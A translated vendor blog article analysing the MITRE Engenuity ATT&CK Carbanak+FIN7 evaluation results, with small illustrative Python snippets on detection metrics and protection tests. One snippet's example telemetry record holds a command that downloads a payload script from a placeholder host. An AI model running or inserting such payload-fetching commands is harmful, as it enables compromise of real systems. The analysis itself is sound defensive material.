NOTE: This article has been translated into English from the original Medium article in Chinese.
John Jiang, CyCraft Cybersecurity Researcher
Every year, the ATT&CK Evaluations have grown in scale and scope, going more in-depth and attracting more participating vendors, with each vendor doing everything they can to demonstrate their value and worth to potential customers. Yet this evaluation environment also creates a situation in which every vendor can come out looking like a winner.
I would like to offer an opinion that I know differs from the opinions of the general public.
The general public believes that a vendor’s marketing material is biased and not worth referencing. But when you need to evaluate a product carefully, seeing how these vendors interpret their own products is still very useful and important. After all, I honestly do believe in the value of our own products. Surely, my colleagues at other vendors feel the same about theirs?
Participation in the ATT&CK Evaluations does not immediately validate a vendor or their products; conversely, a vendor’s lack of participation doesn’t necessarily invalidate their products either. Each participating vendor willingly subjects their own products to the evaluation and openly discloses the results to the public.
We should encourage more vendors to participate in such transparent evaluations so that buyers and end users can directly study how each product performs given the same attack scenario.
Last year, I went into granular detail explaining how best to interpret the ATT&CK APT29 Evaluation results and the detection categories. This year, I’d like to start from the more neutral point of view of an information security analyst, explain the differences between this year’s and last year’s evaluations, and show how to look at this new evaluation from a perspective other than a purely data-driven one.
And yes, I am a data scientist.
This year had six detection categories (listed from “worst” to “best”): N/A, None, Telemetry, General, Tactic, and Technique. These six categories were determined by the level of enrichment that accompanied each detection (e.g., Did it use the preferred data source to achieve this detection? Did it accurately label and correlate the detection to its corresponding ATT&CK framework tactic or technique?).
Only General, Tactic, and Technique detections were counted as Analytic Detections. On the other end of the spectrum, N/A signifies that the vendor chose not to participate in that particular test step.
Those test steps were the new Linux portion as well as the Protections test; both of these were optional this year. Data Sources were added as auxiliary information this year, allowing users to see the type of data a vendor used to achieve each detection.
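To make the ranking concrete, here is a minimal sketch (my own illustration, not MITRE Engenuity tooling) of how the six categories can be ordered and which of them count toward analytic detections:

```python
# Minimal sketch (illustration only, not MITRE Engenuity tooling): ordering
# the Round 3 detection categories and flagging which count as analytic.

# Categories listed from "worst" to "best", as described above.
CATEGORY_RANK = ["N/A", "None", "Telemetry", "General", "Tactic", "Technique"]

# Only General, Tactic, and Technique count toward Analytic Coverage.
ANALYTIC = {"General", "Tactic", "Technique"}

def best_category(categories):
    """Return the highest-quality category among a substep's detections."""
    return max(categories, key=CATEGORY_RANK.index)

def is_analytic(category):
    return category in ANALYTIC

# Example: a substep with both a Telemetry and a Technique detection counts
# as an analytic detection at the Technique level.
substep_detections = ["Telemetry", "Technique"]
best = best_category(substep_detections)
print(best, is_analytic(best))  # -> Technique True
```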
For more detailed examples of detection content, what the ATT&CK Evaluations are, or what the ATT&CK Framework is, please refer to our previous blog articles:
Round 3 removed portions of the evaluation involving significant amounts of human intervention (e.g., MSSP, Host Interrogation, and Residual Artifacts). We have been closely observing the ATT&CK Evaluations since they started in 2018 and have participated in the last two rounds — APT29, Carbanak & FIN7.
We could see that while MITRE wanted to test the response of SOC/MDR service providers in the form of MSSP during Round 2, the results drew considerable controversy, and rightly so.
After all, when you already know what the attacker has done (and even who the attacker is, which rarely happens in the real world), human analysts can certainly intuit something from the data. MITRE (now MITRE Engenuity, see here for why) decided to discontinue the MSSP portion of the evaluations for Round 3.
Round 3 removed detection modifiers that could not be uniformly quantified across all vendors, such as Correlated, Innovative, and Alert. As we mentioned in our article last year, alerts are presented differently by each vendor; all solutions detect, but how they present this data to the end user differs. Correlated had similar issues. Innovative had good intentions behind it but proved far too subjective to score, as each vendor’s approach to detecting, responding, analyzing, and presenting all of this to the end user is ultimately unique. As we observed from last year’s alert ratio chart, the way vendors present their solution’s collected data to the end user varies considerably.
We also saw differences in vendor test strategy this year. 24 of the 29 vendors made configuration changes and/or had delayed detections during the evaluation. Let’s briefly discuss the two here.
Vendors can opt to perform configuration changes after the initial execution of attack scenarios in one of three ways.
The Delayed detection modifier was applied when a detection was not immediately made available to the MITRE Engenuity evaluation team due to various factors. 21 of the 29 vendors had delayed detections.
Here is a chart ranking all 29 vendors by the total number of configuration changes and delayed detections across all 174 attack substeps.
It also reflects that vendors have done their best to promote as many detections as possible to the Technique/Tactic level. How successful were they? Here are some quick statistics for you.
In order for MITRE Engenuity to evaluate vendor solutions during an intrusion, protections on said solutions needed to be disabled or in alert mode only. For this round, vendors could opt to participate in an additional protection-oriented evaluation. This was the first round this optional evaluation extension was available to vendors.
MITRE Engenuity engineered 10 test cases — five for Carbanak and five for FIN7. In each test case, participants were not allowed to block certain malicious activities, such as lateral movement via pass-the-hash. Evaluators would then begin executing adversarial techniques step-by-step and determine when and if the test case attack would eventually be blocked by the solution.
As shown in the figure above, there are a total of 3+1 categories: three protection categories plus the User Consent modifier.
The protection categories divide the original attack scenario of 20 major attack steps into 10 tests, labeled Tests 1–5 and Tests 11–15. As shown in the example above (Test 4), once one of a test’s attack techniques is blocked, the subsequent techniques in that test are not executed or tested.
In Test 4, when the emulated attacker tried to execute Pass the Hash from Linux, they were blocked because the malware delivered remotely by impacket-psexec was caught as soon as it landed. The subsequent attack steps of Test 4 are therefore listed in gray font, signifying they were not executed and thus not tested.
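To illustrate the mechanics, here is a toy sketch of the rule described above; the technique names and labels are hypothetical, and this is not the official test harness:

```python
# Toy sketch (hypothetical technique names and labels, not the official test
# harness): once a technique in a protection test is blocked, the remaining
# techniques in that test are skipped, mirroring the gray-font substeps above.

def run_protection_test(techniques, is_blocked):
    """Execute techniques in order; stop at the first one that is blocked."""
    results = []
    for technique in techniques:
        if is_blocked(technique):
            results.append((technique, "Blocked"))
            break  # subsequent techniques are not executed or tested
        results.append((technique, "Not blocked"))
    tested = {name for name, _ in results}
    skipped = [t for t in techniques if t not in tested]
    return results, skipped

# A Test 4-style sequence: the remotely delivered payload is blocked, so
# everything after it is skipped (shown in gray in the real results).
test_4 = ["Valid Accounts", "Pass the Hash (impacket-psexec)", "Remote Service Execution"]
results, skipped = run_protection_test(test_4, lambda t: "Pass the Hash" in t)
print(results)  # [('Valid Accounts', 'Not blocked'), ('Pass the Hash (impacket-psexec)', 'Blocked')]
print(skipped)  # ['Remote Service Execution']
```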
Returning to this section’s title, “The Completely New (But Not Really New) Evaluation, Protections,” MITRE Engenuity, as it appears to me, attempted to ensure that the protection categories wouldn’t be just another simple malicious-program practice test. They wanted to test the blocking of attack techniques based on suspicious endpoint behavior, not just a static list of IoCs. This brings us to the User Consent modifier.
Nowadays, antivirus (AV) software often faces a dilemma: be too aggressive and misjudge too often, or be too conservative and catch too little; as a result, AV software is often scoffed at by customers as useless.
The ATT&CK Evaluations focus on testing techniques, and not all techniques are 100% malicious. Some are part of everyday network life but can be used with malicious intent. Should techniques in these gray areas be blocked or allowed? Some vendors choose to leave that decision to the user; hence the inclusion of the User Consent modifier in the protection categories.
Those following the ATT&CK Evaluations will know that the emulated adversaries for Round 4 are Wizard Spider and Sandworm. The former is a financially motivated group that has been conducting ransomware attack campaigns since at least August 2018. Ransomware attacks often take advantage of the gray areas we mentioned above, so here is my bold guess: there will be many User Consent modifiers in the protection categories next round.
In Round 3, only 17 of the 29 vendors participated in the Protection Categories. There are many ways to interpret this data. Let’s take a closer look at Test 3: UAC Bypass and Credential Dumping.
In Test 3, 12 of the 17 vendors deleted the smrs.exe (actually mimikatz) malware after it landed. Only 4 vendors did not block mimikatz itself but did block its follow-up behavior. One vendor even only discovered that the machine had been broken into during the test. It is a pity that the results this time weren’t too revealing and were unable to give transparency into how each vendor deals with detecting and blocking gray behavior. But after all, this was the first time the ATT&CK Evaluations had conducted protection-related tests. Here’s another bold (but not really) claim: there will be many changes to the protection categories for Round 4.
The following screenshot shows that McAfee deleted smrs.exe when it landed.
After its absence from the first two rounds, Linux was finally included in the evaluations; however, as not all vendors support Linux, this portion, like the protection categories, was completely optional.
In many security incidents, Linux-based attacks are where defenders seriously lack visibility, yet much of today’s cloud infrastructure and most externally facing servers run on Linux. Improving visibility, detection, and response capabilities in Linux environments is important. This begs the question:
A small fraction of the 174 attack substeps were dedicated to Linux. I summarize the Linux category into 3 tests: basic endpoint monitoring capabilities, protections (lateral movement and pass the hash), and, most importantly, interactions across endpoints.
This covers the basic capability of an EDR: users should be able to see which commands were executed, along with the time, the endpoint, and the command content. All of these were tested in the Linux category for Round 3.
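As an illustration only (a hypothetical record format, not any vendor’s actual schema), this is roughly the process-execution record that such basic Linux telemetry boils down to:

```python
# Illustration only: a hypothetical record for the kind of Linux process
# telemetry an EDR should surface, i.e., which command ran, where, and when.
from dataclasses import dataclass
from datetime import datetime, timezone

@dataclass
class ProcessEvent:
    timestamp: datetime   # when the command was executed
    endpoint: str         # which host it ran on
    user: str             # the account that ran it
    command_line: str     # the full instruction content

event = ProcessEvent(
    timestamp=datetime(2021, 4, 20, 3, 14, 7, tzinfo=timezone.utc),
    endpoint="linux-fileserver-01",  # hypothetical hostname
    user="root",
    command_line="curl -sO http://192.0.2.10/payload.sh",  # example command
)
print(f"{event.timestamp.isoformat()} {event.endpoint} {event.user}: {event.command_line}")
```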
The following is taken from Elastic’s evaluation results.
Unfortunately, the overall results did not yield many highlights. After all, antivirus vendors (or vendors who started out with AV solutions and then later incorporated different solutions as the market evolved) should be used to these types of examinations.
However, only a few vendors can support Linux, and fewer participated in the protection categories. If protecting Linux hosts is a priority for you, these examinations should prove more and more valuable to you as MITRE Engenuity matures them in the years to come.
The following is taken from Cybereason’s evaluation results:
This is definitely the most important part of the Linux evaluation because most of the vendors who participated in this portion of the evaluation were prepared to detect Linux-based attacks. The results were very close in terms of data alone.
However, the predicament many real environments face today is that the complexity of the investigation interface, combined with the large amount of raw data, slows investigations down. Moreover, vendors whose EDR solutions have both Linux and Windows visibility may split them across separate operating interfaces; this portion therefore tests the interactions between endpoints running different operating systems and the vendor’s ability to monitor, detect, and respond across them.
The following figures are taken from the evaluation results of the same attack step from CyCraft (top) and MicroFocus (bottom).
As a data scientist, I’m always thinking about what data tells me, and, sometimes more importantly, what data doesn’t tell me. When using evaluation result data to compare vendors, what can’t be expressed by the data at face value?
I think “Vendor Configuration” is something that needs to be made more visible to end users viewing ATT&CK Evaluation result data. When you are interested in a vendor’s result data, you also need to look carefully at how their solution was configured. For example, let’s take a closer look at Elastic’s configuration.
Elastic did not bring its own EDR to the evaluation this year. Instead, it used a combination of Winlogbeat, Sysmon, and Elastic for the evaluation. This is actually a big change: Elastic switched to freely available tools of its own accord. The reason may have been commercial promotion or the public good; regardless, it is an interesting point that is completely invisible when looking only at the data at face value.
In addition to the changes in Detection Categories, MITRE Engenuity also removed the detection modifiers Alert and Correlation; however, the concepts of “alert” and “correlation” weren’t completely removed from the evaluation results.
Instead, MITRE Engenuity presents this data in another way and from a slightly more neutral perspective. When opening a vendor’s Carbanak+FIN7 results page, you immediately see three important things highlighted at the top of the page: the vendor’s alert strategy, their correlation strategy, and screenshots of their solution.
Why is this the highlight of this evaluation? If you rummage through all these results, you will find that the detection capabilities of good vendors are fairly similar; however, they are very different in terms of data presentation.
Understanding the workflow, UI, and UX of any information security technology should be at the top of your checklist when shopping for new solutions — especially for larger organizations. The more endpoints you have, the more noise your solutions potentially generate, which leads you to this very important question.
After researching the results of all the vendors, you should find these common challenges with most vendors’ solutions:
Remember that false positives were not considered in the evaluation. The number of endpoints used in the Carbanak + FIN7 evaluation could be counted on two hands. If the number of endpoints were increased (as it would be in a real MDR environment), the number of false positives would increase, magnifying these challenges several times over.
MIA MSSP
As mentioned earlier in this article, for the Round 3 Evaluations, MITRE Engenuity removed the MSSP detection category from the previous round. MSSP’s implementation in Round 2 did cause some controversy, so its removal in Round 3 is understandable. It is a pity we couldn’t view and analyze more in-depth data on the capabilities of various vendors’ MDR/security analyst teams.
Just like last year’s article, I want to end on something actionable for you, the reader. The number of ATT&CK Evaluation participants has only increased (from 12 to 21 to 29), and there’s no reason to see this momentum slow down in the years to come; this means that the ATT&CK Evaluations — be they run by MITRE or MITRE Engenuity — will annually release more and more data on vendors for buyers, analysts, and vendors to dissect, study, and market. With so much data to analyze each year, it’s critical for buyers to keep focus on these key factors when choosing a cybersecurity solution or vendor.
Information Security Defense Strategy:
This term encompasses a wide range, but what I want to stress here is that you should first know (with 100% confidence) where your strengths, as well as your defensive gaps, are. There are well over 200 ATT&CK adversarial tactics and techniques. Know which ones are a priority for your organization and which ones pose the biggest threat to your industry. Triage your priorities. Determine which vendor or solution best complements your defense and fills in most of your defensive gaps.
Realistic Workflow, UI, UX:
If you have limited information security personnel or resources, I recommend that you consider selecting solutions with dashboards your information security personnel can understand clearly and quickly. One of the most overlooked benefits of the ATT&CK Evaluations is the screenshots of each dashboard accompanied by the Alert and Correlation strategies of each vendor. Have your team create UI and UX metrics for viewing and rating dashboards and immediately eliminate unintelligible dashboards from consideration.
Visibility & Coverage:
When the Round 3 evaluation results were released this year, MITRE Engenuity also made several big changes to their webpage. One of the biggest changes was the inclusion of 4 metrics on each vendor’s overview page: Detection Count (total detections in the evaluation), Analytic Coverage (number of attack substeps that had a General, Tactic, or Technique detection), Telemetry Coverage (number of attack substeps that had a Telemetry detection), and Visibility (number of attack substeps with either a telemetry or analytic detection).
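To show how the four metrics relate to one another, here is a sketch that computes them from a made-up list of per-substep detection categories (an illustration of the definitions above, not the official results schema or scoring code):

```python
# Sketch of how the four overview metrics relate, assuming each substep is
# summarized by the list of detection categories it received (made-up data,
# not the official results schema).

ANALYTIC = {"General", "Tactic", "Technique"}

def overview_metrics(substeps):
    detection_count = sum(
        1 for cats in substeps for c in cats if c not in ("None", "N/A")
    )
    analytic_coverage = sum(1 for cats in substeps if ANALYTIC & set(cats))
    telemetry_coverage = sum(1 for cats in substeps if "Telemetry" in cats)
    visibility = sum(
        1 for cats in substeps if ANALYTIC & set(cats) or "Telemetry" in cats
    )
    return detection_count, analytic_coverage, telemetry_coverage, visibility

# Hypothetical vendor results for four substeps.
substeps = [
    ["Telemetry", "Technique"],  # visible and analytic
    ["Telemetry"],               # visible, telemetry only
    ["General", "Tactic"],       # analytic without telemetry
    ["None"],                    # missed
]
print(overview_metrics(substeps))  # -> (5, 2, 2, 3)
```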
It is a bit odd that, by creating these metrics, MITRE Engenuity indirectly created a score, something MITRE (and MITRE Engenuity) stated they wouldn’t do in the ATT&CK Evaluations. These terms can also be easily misunderstood, as a better number in one metric doesn’t always mean a better solution.
High detection counts may simply mean noise amplification. Telemetry Coverage is good for post-breach IR and log compliance but not so useful during a live attack, so Visibility can naturally be misleading, as it also includes Telemetry Coverage. Analytic Coverage combined with Detection Count can tell you the ratio of enriched detections you will receive during an attack. However, no matter how many detections are made, if your team experiences a high amount of friction in workflow, UI, or UX, then the detection count might not matter that much.
Use these metrics (Detection Count, Analytic Coverage, Telemetry Coverage, and Visibility) alongside your metrics for Workflow, UI, and UX to help filter out vendors with more effective and actionable intelligence; solutions that perform automated triage for detections could prove especially useful for your team.
In last year’s article, we discussed how organizations at different maturity levels should analyze ATT&CK Evaluation results. Although six years can be seen as a long time in the tech industry, the ATT&CK framework (at six years old) is still nascent, with more and more offshoot projects appearing, such as the recent release of D3FEND. As more and more new organizations begin to explore and invest in MDR, we wanted to give a more actionable approach to analyzing the ATT&CK Evaluation result data this year.
The first thing to do is to assess your threats. Only when you understand the active and emerging threats you are facing — as well as the threats leadership wants prioritized — can you make the most effective and impactful procurement and information security plan, yielding the best ROI. Security isn’t easy. It takes time and cooperation across departments. The first step may be the one that takes the most time. You can start with the following:
You’ve identified the active and emerging threats targeting your industry and are even familiar with their documented behavior. The next step is to translate this intelligence into a language that is quantifiable and can be evaluated. This is where the ATT&CK framework becomes exceedingly beneficial.
Let’s take a closer look at a practical (and unfortunately common) example. Your organization has been targeted by a spearphishing campaign. Spearphishing emails caused users to execute macros in Word files. The macros executed malicious VB scripts and then used mimikatz to gain admin credentials. The attackers then passed the hash, giving them access to other endpoints.
This attack could be expressed using ATT&CK framework adversarial techniques, as sketched below.
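The mapping below is my own reading of that chain (an illustrative annotation, not an official enumeration of the scenario’s techniques):

```python
# One possible mapping of the spearphishing scenario above onto ATT&CK
# technique IDs (my own reading of the attack chain, not an official list).
attack_chain = [
    ("Spearphishing email with weaponized Word file", "T1566.001"),  # Phishing: Spearphishing Attachment
    ("User opens the file and enables macros",        "T1204.002"),  # User Execution: Malicious File
    ("Macro runs a malicious VB script",              "T1059.005"),  # Command and Scripting Interpreter: Visual Basic
    ("mimikatz dumps credentials for admin access",   "T1003.001"),  # OS Credential Dumping: LSASS Memory
    ("Pass the hash to reach other endpoints",        "T1550.002"),  # Use Alternate Authentication Material: Pass the Hash
]

for behavior, technique_id in attack_chain:
    print(f"{technique_id}: {behavior}")
```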
After the active and emerging threats are sorted and converted into ATT&CK techniques, identify the adversarial techniques that your current security stack has difficulty detecting or that your SOC team considers the most painful to investigate, such as techniques that require contextual judgment (for instance, Use Alternate Authentication Material: Pass the Hash, T1550.002).
Evaluate how vendors handled those specific techniques. Don’t forget to pay close attention to Configuration Changes during your evaluation, as the evaluation settings for that particular solution will most likely differ if integrated into your environment. We recommend using the official MITRE Engenuity Technique Comparison Tool.
Cybersecurity vendors — not just MDR vendors — often tailor services to fit a customer’s unique set of needs for their unique environment and concerns; the 29 vendors participating in the Carbanak + FIN7 MITRE Engenuity ATT&CK Evaluations are no exception. Each organization has a unique set of needs depending on their industry and size. One of the most important factors is cybersecurity maturity level. Below is a helpful guide for organizations at different cybersecurity maturity levels and how they can get the most out of the ATT&CK Evaluation results.
Small and medium-sized organizations typically do not have sufficient information security personnel to be able to detect, investigate, or respond to each incident or alert. At this maturity level, it is advisable to prioritize selecting a vendor that provides MSSP/MDR services. Since MSSP was not tested this year, you will need to perform this assessment yourself (See Step 3 above). You can also use this screening process to help you find a vendor faster:
Money, especially an information security budget, has to be spent where it matters most. After narrowing down your selection of vendors, analyze how they performed in previous evaluations. Did the previous rounds’ emulated threat actors use similar ATT&CK techniques? How did the vendor’s performance on that particular ATT&CK technique compare across the multiple evaluations? Solutions, like your organization, are not static; they evolve and improve over time. Is the vendor developing and improving their solutions?
With full-time security analysts, you need enriched threat intelligence to guide effective and impactful analyses and investigations. Features such as automated triage and investigations help alleviate SOC pain points, allowing for a more effective team with time for more proactive defense strategies. You can also use this screening process to help you find a suitable vendor faster:
Prioritizing and understanding a security product’s realistic workflow, UI, and UX is important for organizations at this maturity level. Let’s look at a specific Telemetry Detection example.
Below are screenshots taken from VMware Carbon Black and FireEye. Both are dealing with the same attack substep: Use Alternate Authentication Material: Pass the Hash (T1550.002); however, how each platform presents this data is very different. Presentation, and your team’s understanding of it, will greatly affect investigation and response speed.
Although your SecOps operates 24/7, your security personnel cannot spend 24 hours a day sitting in front of computer screens looking at raw telemetry data. Time becomes an even more valuable resource, as SecOps tends to juggle multiple necessary tasks.
Once again, features such as automated alert triage and automated investigations can help alleviate SOC pain points, allowing for a more effective and proactive team. You can also use this screening process to help you find a suitable vendor faster:
In our previous example, we compared Telemetry Detections and hinted at how the design and layout of a product’s interface can affect investigation speed. For this example, we will look at two Technique Detections. When they can accurately detect adversarial ATT&CK techniques, some vendors present raw data as auxiliary data, while others actively work on designing intuitive dashboards to help SOC teams reduce MTTR (mean time to respond).
Rounds 1 and 2 were managed directly by MITRE. Round 3 was managed by MITRE Engenuity, which will manage all future evaluation rounds. First and foremost, I want to commend MITRE Engenuity for their hosting and their attempts at greater neutrality in the evaluations. I look forward to seeing how they will continue to improve the evaluations.
The number of participating vendors has increased and will likely continue to increase for, at least, the next few years.
However, vendors are becoming more and more familiar with evaluation methods and are getting better at configuration changes. In Round 3, out of all the detections made due to configuration changes, 17.6% resulted in Telemetry detections, 9.6% resulted in General detections, 4.9% resulted in Tactic detections, and 67.9% resulted in Technique detections.
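A quick bit of arithmetic on the published percentages above shows how heavily configuration-change detections skewed toward the analytic categories:

```python
# Quick arithmetic on the Round 3 breakdown quoted above: the share of
# configuration-change detections that were analytic (General/Tactic/Technique).
config_change_breakdown = {
    "Telemetry": 17.6,
    "General": 9.6,
    "Tactic": 4.9,
    "Technique": 67.9,
}
analytic_share = sum(
    share for category, share in config_change_breakdown.items()
    if category != "Telemetry"
)
print(f"Analytic share of configuration-change detections: {analytic_share:.1f}%")  # -> 82.4%
```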
For better or worse, the ATT&CK Evaluations (as well as the heavily marketed results) do foster a sense of an arms race within the cybersecurity industry.
While the detection capabilities of vendors are similar, cybersecurity vendors who provide more effective and actionable intelligence, and present said intelligence to security teams in a simpler, more intuitive, and more thorough way, can truly stand out.
Information regarding the next round of the MITRE Engenuity ATT&CK Evaluations also came out much more quickly than last year. I am looking forward to the next round, Wizard Spider and Sandworm. The cybersecurity Twitter space has been dominated by talk of ransomware, so Wizard Spider’s inclusion in Round 4 seems like the logical step forward. Seeing how each vendor deals with ransomware (detection, response, and data presentation) will be extremely beneficial.
Despite any flaws or misgivings anyone may have about the evaluation process, the ATT&CK Evaluations are incredibly useful not only to end users and analysts but also to the vendors themselves, as they get feedback on the efficacy of their solutions and on how well those solutions incorporate ATT&CK framework terminology into their UI/UX, which is ultimately, and potentially, even more beneficial for the end user.
Writer: CyCraft
CyCraft is a cybersecurity company specializing in AI-driven automation. Founded in 2017, it is headquartered in Taiwan with overseas offices in Japan and Singapore. It serves government agencies, police and defense organizations, banks, and high-tech manufacturers across the Asia-Pacific region. CyCraft’s AI and machine learning solutions have earned strong backing from the CID Group and from Pavilion Capital, a subsidiary of Temasek Holdings, as well as recognition in multiple categories from leading international research firms such as Gartner, IDC, and Frost & Sullivan, and numerous domestic and international awards. CyCraft also participates in many security communities and conferences at home and abroad and has worked for years to advance the security industry.